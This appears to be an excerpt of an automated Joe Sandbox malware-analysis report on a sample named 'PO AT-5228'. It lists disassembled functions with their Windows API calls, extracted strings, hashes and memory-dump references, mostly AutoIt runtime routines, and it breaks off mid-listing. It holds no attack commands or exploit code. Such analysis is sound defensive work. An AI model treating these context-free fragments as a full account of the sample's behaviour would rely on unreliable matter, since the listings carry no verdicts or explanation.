                                                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                        • String ID:
                                                                                        • API String ID: 884005220-0
                                                                                        • Opcode ID: 7f0f1c5b8a72be5813d1a2c913ab5a33ac5eca2a2f13b92b5f4ccec50141ab55
                                                                                        • Instruction ID: 8f296b2da9959aee61bb2661cb79ad128402d786ae72650b4a7f4643487b5995
                                                                                        • Opcode Fuzzy Hash: 7f0f1c5b8a72be5813d1a2c913ab5a33ac5eca2a2f13b92b5f4ccec50141ab55
                                                                                        • Instruction Fuzzy Hash: 3761B172900215AFDF216F64DC82B6D37E8EB12761F2045BAE801AB1D2DF34D942CBA5
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00BCE754
                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00BCE76B
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00BCE776
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BCE783
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00BCE78C
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00BCE79B
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00BCE7A4
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BCE7AB
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00BCE7BC
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BED9BC,?), ref: 00BCE7D5
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00BCE7E5
                                                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 00BCE809
                                                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00BCE834
                                                                                        • DeleteObject.GDI32(00000000), ref: 00BCE85C
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00BCE872
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                                                        • Instruction ID: a7120316146fed6ff0a18c5b6d4a019fb76f8b0ada73619d6541b74d1a6cfd60
                                                                                        • Opcode Fuzzy Hash: 885004bd41d0f0d8584422853e352572b74dec804af27d0555adab2136b44eec
                                                                                        • Instruction Fuzzy Hash: 50413775600244EFDB119F65DC88EAA7BB8EF89711F108098F916EB2A0DB75ED41DB20
                                                                                        APIs
                                                                                        • __wsplitpath.LIBCMT ref: 00BB076F
                                                                                        • _wcscat.LIBCMT ref: 00BB0787
                                                                                        • _wcscat.LIBCMT ref: 00BB0799
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB07AE
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB07C2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00BB07DA
                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00BB07F4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB0806
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                        • String ID: *.*
                                                                                        • API String ID: 34673085-438819550
                                                                                        • Opcode ID: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                                                        • Instruction ID: baf029750231d3ff274e3477bd9f632828f334114c3f3b1fd8d209c62e34ce39
                                                                                        • Opcode Fuzzy Hash: a3563cf3d4b45e83da25be50a68cf34b62c135f0f9b3342a9dd97f697fe4a549
                                                                                        • Instruction Fuzzy Hash: 298193715143419FCB24EF24C8859BFB7D8EB94304F1488AEF88AD7250EAB4D944CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BCEF3B
                                                                                        • GetFocus.USER32 ref: 00BCEF4B
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00BCEF56
                                                                                        • _memset.LIBCMT ref: 00BCF081
                                                                                        • GetMenuItemInfoW.USER32 ref: 00BCF0AC
                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00BCF0CC
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00BCF0DF
                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00BCF113
                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00BCF15B
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BCF193
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00BCF1C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: c2069bbf0a5d4b8817fa1bc3628c0d2cd7d14cb2f55b559c049fc1f7e16c8359
                                                                                        • Instruction ID: 1b2044b9ee83158025d2768bae8621186b1c98e89c371b10595e70a14c0ccafe
                                                                                        • Opcode Fuzzy Hash: c2069bbf0a5d4b8817fa1bc3628c0d2cd7d14cb2f55b559c049fc1f7e16c8359
                                                                                        • Instruction Fuzzy Hash: C7816B71604342EFDB20CF15C884FBABBEAEB88714F1445AEF99497291D770D905CB52
                                                                                        APIs
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B9ABD7
                                                                                          • Part of subcall function 00B9ABBB: GetLastError.KERNEL32(?,00B9A69F,?,?,?), ref: 00B9ABE1
                                                                                          • Part of subcall function 00B9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B9A69F,?,?,?), ref: 00B9ABF0
                                                                                          • Part of subcall function 00B9ABBB: HeapAlloc.KERNEL32(00000000,?,00B9A69F,?,?,?), ref: 00B9ABF7
                                                                                          • Part of subcall function 00B9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B9AC0E
                                                                                          • Part of subcall function 00B9AC56: GetProcessHeap.KERNEL32(00000008,00B9A6B5,00000000,00000000,?,00B9A6B5,?), ref: 00B9AC62
                                                                                          • Part of subcall function 00B9AC56: HeapAlloc.KERNEL32(00000000,?,00B9A6B5,?), ref: 00B9AC69
                                                                                          • Part of subcall function 00B9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B9A6B5,?), ref: 00B9AC7A
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B9A8CB
                                                                                        • _memset.LIBCMT ref: 00B9A8E0
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B9A8FF
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A910
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B9A94D
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B9A969
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B9A986
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B9A995
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B9A99C
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B9A9BD
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00B9A9C4
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B9A9F5
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B9AA1B
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B9AA2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                                                        • Instruction ID: 0006826b26fcbeee3bae80ce43edf7f01545b923476b9423f5ba8328476eabe5
                                                                                        • Opcode Fuzzy Hash: 2a8b34053e1036080b22990d5978b3b04daa0a34943a420243ec75f8982ec81b
                                                                                        • Instruction Fuzzy Hash: 2E517F71900209AFDF10DF94DD99EEEBBB9FF04300F048169F911AB291DB759A06CBA1
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00BB9E36
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00BB9E42
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00BB9E4E
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00BB9E5B
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00BB9EAF
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00BB9EEB
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00BB9F0F
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00BB9F17
                                                                                        • DeleteObject.GDI32(?), ref: 00BB9F20
                                                                                        • DeleteDC.GDI32(00000006), ref: 00BB9F27
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00BB9F32
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 165c0e55a5a141d56970d5c8a8adf1f9fca0d647b17bd9923cae1ab43c4023ea
                                                                                        • Instruction ID: 57565cfc9fc87b681df4d9144b724f7ce7f42629dfd6cd5e1bf50d0242434d1b
                                                                                        • Opcode Fuzzy Hash: 165c0e55a5a141d56970d5c8a8adf1f9fca0d647b17bd9923cae1ab43c4023ea
                                                                                        • Instruction Fuzzy Hash: 45513975900349AFCB14CFA8C885EAEBBF9EF48310F14885DF95AAB210C775A941CB50
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-2391861430
                                                                                        • Opcode ID: 14b2aaf78f4cc1c626ed371e9e37ba078592ba666313ec92576276c59069cf38
                                                                                        • Instruction ID: 46fee02570509839355b4bf0b4a93089c542c1f8e07012cd6a4247d6bc3ca095
                                                                                        • Opcode Fuzzy Hash: 14b2aaf78f4cc1c626ed371e9e37ba078592ba666313ec92576276c59069cf38
                                                                                        • Instruction Fuzzy Hash: D3517E71900109BACF25EBE4CD46EEEBBB8EF1A304F1001A5F505720A2EB756F59DB61
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 2889450990-3420473620
                                                                                        • Opcode ID: a04d3f5d8ab2da43e760d4fb3ee27c1474e9ef31aa132f9f779ff4291bcceffa
                                                                                        • Instruction ID: c97e7eb9042389d6ba001536de5fd121b24c39dfd75d328df1f70fa7c5cc7999
                                                                                        • Opcode Fuzzy Hash: a04d3f5d8ab2da43e760d4fb3ee27c1474e9ef31aa132f9f779ff4291bcceffa
                                                                                        • Instruction Fuzzy Hash: 46517F71900249AACF25EBE0CD42EEEBBB8EF15344F1001A5F505720A2EB756F99DF61
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00BA55D7
                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00BA5664
                                                                                        • GetMenuItemCount.USER32(00C21708), ref: 00BA56ED
                                                                                        • DeleteMenu.USER32(00C21708,00000005,00000000,000000F5,?,?), ref: 00BA577D
                                                                                        • DeleteMenu.USER32(00C21708,00000004,00000000), ref: 00BA5785
                                                                                        • DeleteMenu.USER32(00C21708,00000006,00000000), ref: 00BA578D
                                                                                        • DeleteMenu.USER32(00C21708,00000003,00000000), ref: 00BA5795
                                                                                        • GetMenuItemCount.USER32(00C21708), ref: 00BA579D
                                                                                        • SetMenuItemInfoW.USER32(00C21708,00000004,00000000,00000030), ref: 00BA57D3
                                                                                        • GetCursorPos.USER32(?), ref: 00BA57DD
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00BA57E6
                                                                                        • TrackPopupMenuEx.USER32(00C21708,00000000,?,00000000,00000000,00000000), ref: 00BA57F9
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BA5805
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3993528054-0
                                                                                        • Opcode ID: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                                                        • Instruction ID: 82a282370cc40674dd3c098ec7f813de0a07eb5f6ed4404d5e481aaeef05132c
                                                                                        • Opcode Fuzzy Hash: 5a61aca236f08ad4aaa885654b661bcaf2f0ccaff53bfb58eb683f93b052c129
                                                                                        • Instruction Fuzzy Hash: 4671E370649605BEEB309F58CC89FAABFE5FF42364F240286F6156A1E0CBB15D10DB90
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B9A1DC
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B9A211
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B9A22D
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B9A249
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B9A273
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00B9A29B
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2A6
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9A2AB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1687751970-22481851
                                                                                        • Opcode ID: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                                                        • Instruction ID: 6b207d78799008a8df06dc57e533ee7eb76f35d4f74e29e271c905d436dd8d95
                                                                                        • Opcode Fuzzy Hash: 45db9a6bc7323269785a3d2f0064974c8026a45e67237f34d043ef1a7aa44d62
                                                                                        • Instruction Fuzzy Hash: 2C410576C10229AADF21EBA4DC95DEDB7B8FF04300F0441A9F805B71A1EB749E15CB90
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BC2BB5,?,?), ref: 00BC3C1D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                                                        • Instruction ID: 78ea50a94d972742314d64188b5ca136545c331db783d8f102f06a0fb6786918
                                                                                        • Opcode Fuzzy Hash: 263b8426f18ccdb5aa092764c89dc91e6b9f45bfa3bc969262cc9d89ccfb0e52
                                                                                        • Instruction Fuzzy Hash: 744152741102498BCF05EF14D891EEA37E9EF16700F5084E8FC661B191EB70DE5ACB10
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00BD36F4,00000010,?,Bad directive syntax error,00BFDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00BA25D6
                                                                                        • LoadStringW.USER32(00000000,?,00BD36F4,00000010), ref: 00BA25DD
                                                                                        • _wprintf.LIBCMT ref: 00BA2610
                                                                                        • __swprintf.LIBCMT ref: 00BA2632
                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00BA26A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                        • API String ID: 1080873982-4153970271
                                                                                        • Opcode ID: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                                                        • Instruction ID: 0ad33d0d16b354ca447c5f17c542ed6392215fcc296f021bec77822c2b7ec1a7
                                                                                        • Opcode Fuzzy Hash: 32cfc06c9c80c7112a7bbf7e7ebbea0cdf7dc9ef29bb37dceb0d2e9375641c0b
                                                                                        • Instruction Fuzzy Hash: 8B217E3180025AAFCF11BF94CC4AEEE7BB9BF19304F0404A9F505670A2DA75A669DB50
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00BA7B42
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00BA7B58
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00BA7B69
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00BA7B7B
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00BA7B8C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 890592661-1007645807
                                                                                        • Opcode ID: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                                                        • Instruction ID: 35895733d4de2ca254adfce682c8eb21fb43b0e40f3883c87c57716e6657e654
                                                                                        • Opcode Fuzzy Hash: 0329af34fbbd08dc4b8d9473959cda07139e61c878b6adde815b42c1c786d4f0
                                                                                        • Instruction Fuzzy Hash: 1F11B2E1A842A979D720A361CC9ADFF7EFCEB93B14F4005A97411A60C1DEA00E85C6B0
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00BA7794
                                                                                          • Part of subcall function 00B7DC38: timeGetTime.WINMM(?,75C0B400,00BD58AB), ref: 00B7DC3C
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00BA77C0
                                                                                        • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00BA77E4
